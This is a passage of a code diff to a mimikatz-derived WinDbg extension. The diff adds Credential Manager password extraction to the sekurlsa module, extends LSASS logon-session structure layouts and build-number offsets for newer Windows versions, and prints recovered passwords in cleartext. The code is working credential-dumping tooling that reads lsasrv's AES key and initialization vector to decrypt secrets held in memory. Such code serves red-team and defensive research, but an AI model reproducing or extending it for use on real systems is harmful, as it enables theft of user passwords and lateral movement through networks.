LUID LocallyUniqueIdentifier;
|
||||
LUID SecondaryLocallyUniqueIdentifier;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
struct _KIWI_MSV1_0_LIST_62 *Flink;
|
||||
@ -106,8 +148,7 @@ typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
/*PVOID unk16;
|
||||
PVOID unk17;*/LSA_UNICODE_STRING Type;
|
||||
LSA_UNICODE_STRING Type;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
PVOID unk18;
|
||||
@ -115,6 +156,18 @@ typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
ULONG unk23;
|
||||
ULONG unk24;
|
||||
ULONG unk25;
|
||||
ULONG unk26;
|
||||
PVOID unk27;
|
||||
PVOID unk28;
|
||||
PVOID unk29;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_62, *PKIWI_MSV1_0_LIST_62;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
@ -141,8 +194,7 @@ typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
/*PVOID unk16;
|
||||
PVOID unk17;*/LSA_UNICODE_STRING Type;
|
||||
LSA_UNICODE_STRING Type;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
PVOID unk18;
|
||||
@ -150,8 +202,31 @@ typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
ULONG unk23;
|
||||
ULONG unk24;
|
||||
ULONG unk25;
|
||||
ULONG unk26;
|
||||
PVOID unk27;
|
||||
PVOID unk28;
|
||||
PVOID unk29;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_63, *PKIWI_MSV1_0_LIST_63;
|
||||
|
||||
typedef struct _KIWI_BASIC_SECURITY_LOGON_SESSION_DATA {
|
||||
PLUID LogonId;
|
||||
PLSA_UNICODE_STRING UserName;
|
||||
PLSA_UNICODE_STRING LogonDomain;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
PVOID pCredentials;
|
||||
PSID pSid;
|
||||
PVOID pCredentialManager;
|
||||
} KIWI_BASIC_SECURITY_LOGON_SESSION_DATA, *PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA;
|
||||
|
||||
#define RtlEqualLuid(L1, L2) (((L1)->LowPart == (L2)->LowPart) && ((L1)->HighPart == (L2)->HighPart))
|
||||
extern BOOLEAN WINAPI RtlEqualString(IN const STRING *String1, IN const STRING *String2, IN BOOLEAN CaseInSensitive);
|
||||
extern VOID WINAPI RtlFreeUnicodeString(IN PUNICODE_STRING UnicodeString);
|
||||
@ -170,6 +245,6 @@ void kull_m_string_dprintf_hex(LPCVOID lpData, DWORD cbData, DWORD flags);
|
||||
void kull_m_string_displayFileTime(IN PFILETIME pFileTime);
|
||||
void kull_m_string_displayLocalFileTime(IN PFILETIME pFileTime);
|
||||
void kull_m_string_displayGUID(IN LPCGUID pGuid);
|
||||
void kull_m_string_displaySID(IN PSID pSid)
|
||||
void kull_m_string_displaySID(IN PSID pSid);
|
||||
BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString);
|
||||
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid);
|
||||
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid);
|
||||
@ -69,12 +69,14 @@ KUHL_M_SEKURLSA_PACKAGE packages[] = {
|
||||
{"ssp", "msv1_0!SspCredentialList", 0, kuhl_m_sekurlsa_enum_logon_callback_ssp},
|
||||
{"masterkey", "lsasrv!g_MasterKeyCacheList", 0, kuhl_m_sekurlsa_enum_logon_callback_masterkeys},
|
||||
{"masterkey", "dpapisrv!g_MasterKeyCacheList", 0, kuhl_m_sekurlsa_enum_logon_callback_masterkeys},
|
||||
{"credman", NULL, 0, kuhl_m_sekurlsa_enum_logon_callback_credman},
|
||||
};
|
||||
|
||||
const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
|
||||
{sizeof(KIWI_MSV1_0_LIST_6) , FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_6, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_6 , pSid)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid)}
|
||||
{sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)},
|
||||
};
|
||||
|
||||
DECLARE_API(mimikatz)
|
||||
@ -85,14 +87,15 @@ DECLARE_API(mimikatz)
|
||||
KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData;
|
||||
const KUHL_M_SEKURLSA_ENUM_HELPER * helper;
|
||||
PBYTE buffer;
|
||||
char * sidStr;
|
||||
|
||||
if(NtBuildNumber < 8000)
|
||||
if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_7)
|
||||
helper = &lsassEnumHelpers[0];
|
||||
else if(NtBuildNumber < 9400)
|
||||
else if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_8)
|
||||
helper = &lsassEnumHelpers[1];
|
||||
else
|
||||
else if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
helper = &lsassEnumHelpers[2];
|
||||
else
|
||||
helper = &lsassEnumHelpers[3];
|
||||
|
||||
pInitializationVector = GetExpression("lsasrv!InitializationVector");
|
||||
phAesKey = GetExpression("lsasrv!hAesKey");
|
||||
@ -135,6 +138,7 @@ DECLARE_API(mimikatz)
|
||||
sessionData.LogonDomain = (PUNICODE_STRING) (buffer + helper->offsetToDomain);
|
||||
sessionData.pCredentials= *(PVOID *) (buffer + helper->offsetToCredentials);
|
||||
sessionData.pSid = *(PSID *) (buffer + helper->offsetToPSid);
|
||||
sessionData.pCredentialManager = *(PVOID *) (buffer + helper->offsetToCredentialManager);
|
||||
|
||||
if((sessionData.LogonType != Network) /*&& (sessionData.LogonType != UndefinedLogonType)*/)
|
||||
{
|
||||
@ -151,9 +155,7 @@ DECLARE_API(mimikatz)
|
||||
, sessionData.UserName, sessionData.LogonDomain);
|
||||
|
||||
if(sessionData.pSid)
|
||||
{
|
||||
kull_m_string_displaySID(sessionData.pSid);
|
||||
}
|
||||
dprintf("\n");
|
||||
|
||||
LocalFree(sessionData.UserName->Buffer);
|
||||
@ -164,7 +166,7 @@ DECLARE_API(mimikatz)
|
||||
if(packages[j].symbolPtr || !packages[j].symbolName)
|
||||
{
|
||||
dprintf("\t%s : ", packages[j].name);
|
||||
packages[j].callback(packages[j].symbolPtr, sessionData.LogonId, sessionData.pCredentials);
|
||||
packages[j].callback(packages[j].symbolPtr, &sessionData);
|
||||
dprintf("\n");
|
||||
}
|
||||
}
|
||||
@ -280,9 +282,13 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
||||
, username ? username : &uNull, domain ? domain : &uNull);
|
||||
|
||||
if(!password || kull_m_string_suspectUnicodeString(password))
|
||||
dprintf("%wZ", password ? password : &uNull);
|
||||
else
|
||||
kull_m_string_dprintf_hex(password->Buffer, password->Length, 1);
|
||||
{
|
||||
if((flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS) && password)
|
||||
dprintf("%.*S", password->Length / sizeof(wchar_t), password->Buffer);
|
||||
else
|
||||
dprintf("%wZ", password ? password : &uNull);
|
||||
}
|
||||
else kull_m_string_dprintf_hex(password->Buffer, password->Length, 1);
|
||||
}
|
||||
|
||||
LocalFree(mesCreds->UserName.Buffer);
|
||||
@ -320,4 +326,4 @@ VOID kuhl_m_sekurlsa_genericKeyOutput(PMARSHALL_KEY key, PVOID * dirtyBase)
|
||||
}
|
||||
kull_m_string_dprintf_hex((PBYTE) *dirtyBase + sizeof(ULONG), key->length, 0);
|
||||
*dirtyBase = (PBYTE) *dirtyBase + sizeof(ULONG) + *(PULONG) *dirtyBase;
|
||||
}
|
||||
}
|
||||
@ -19,6 +19,7 @@ USHORT NtBuildNumber;
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS 0x00400000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE 0x00800000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT 0x10000000
|
||||
@ -26,7 +27,7 @@ USHORT NtBuildNumber;
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN 0x40000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_SSP 0x80000000
|
||||
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_PACKAGE_CALLBACK) (IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PLUID logId, IN PVOID pCredentials);
|
||||
typedef void (CALLBACK * PKUHL_M_SEKURLSA_PACKAGE_CALLBACK) (IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData);
|
||||
|
||||
typedef struct _KUHL_M_SEKURLSA_PACKAGE {
|
||||
const char * name;
|
||||
@ -37,25 +38,16 @@ typedef struct _KUHL_M_SEKURLSA_PACKAGE {
|
||||
|
||||
typedef struct _KUHL_M_SEKURLSA_ENUM_HELPER {
|
||||
ULONG tailleStruct;
|
||||
LONG offsetToLuid;
|
||||
LONG offsetToLogonType;
|
||||
LONG offsetToSession;
|
||||
LONG offsetToUsername;
|
||||
LONG offsetToDomain;
|
||||
LONG offsetToCredentials;
|
||||
LONG offsetToPSid;
|
||||
ULONG offsetToLuid;
|
||||
ULONG offsetToLogonType;
|
||||
ULONG offsetToSession;
|
||||
ULONG offsetToUsername;
|
||||
ULONG offsetToDomain;
|
||||
ULONG offsetToCredentials;
|
||||
ULONG offsetToPSid;
|
||||
ULONG offsetToCredentialManager;
|
||||
} KUHL_M_SEKURLSA_ENUM_HELPER, *PKUHL_M_SEKURLSA_ENUM_HELPER;
|
||||
|
||||
typedef struct _KIWI_BASIC_SECURITY_LOGON_SESSION_DATA {
|
||||
PLUID LogonId;
|
||||
PLSA_UNICODE_STRING UserName;
|
||||
PLSA_UNICODE_STRING LogonDomain;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
PVOID pCredentials;
|
||||
PSID pSid;
|
||||
} KIWI_BASIC_SECURITY_LOGON_SESSION_DATA, *PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA;
|
||||
|
||||
LPEXT_API_VERSION WDBGAPI ExtensionApiVersion (void);
|
||||
VOID CheckVersion(void);
|
||||
VOID WDBGAPI WinDbgExtensionDllInit (PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion);
|
||||
@ -63,3 +55,17 @@ DECLARE_API(mimikatz);
|
||||
|
||||
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags);
|
||||
VOID kuhl_m_sekurlsa_genericKeyOutput(struct _MARSHALL_KEY * key, PVOID * dirtyBase);
|
||||
|
||||
#define KULL_M_WIN_BUILD_XP 2600
|
||||
#define KULL_M_WIN_BUILD_2K3 3790
|
||||
#define KULL_M_WIN_BUILD_VISTA 6000
|
||||
#define KULL_M_WIN_BUILD_7 7600
|
||||
#define KULL_M_WIN_BUILD_8 9200
|
||||
#define KULL_M_WIN_BUILD_BLUE 9600
|
||||
|
||||
#define KULL_M_WIN_MIN_BUILD_XP 2500
|
||||
#define KULL_M_WIN_MIN_BUILD_2K3 3000
|
||||
#define KULL_M_WIN_MIN_BUILD_VISTA 6000
|
||||
#define KULL_M_WIN_MIN_BUILD_7 7000
|
||||
#define KULL_M_WIN_MIN_BUILD_8 8000
|
||||
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
|
||||
@ -606,6 +606,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\globals_sekurlsa.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\kuhl_m_sekurlsa.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\kuhl_m_sekurlsa_utils.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_credman.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_dpapi.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_kerberos.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_livessp.h" />
|
||||
@ -657,6 +658,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt63.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\kuhl_m_sekurlsa.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\kuhl_m_sekurlsa_utils.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_credman.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_dpapi.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_kerberos.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_livessp.c" />
|
||||
|
||||
@ -158,6 +158,9 @@
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_misc_struct.h">
|
||||
<Filter>modules</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_credman.h">
|
||||
<Filter>modules\sekurlsa\packages</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.c">
|
||||
@ -292,6 +295,9 @@
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_lsadump.c">
|
||||
<Filter>modules</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_credman.c">
|
||||
<Filter>modules\sekurlsa\packages</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Filter Include="modules">
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user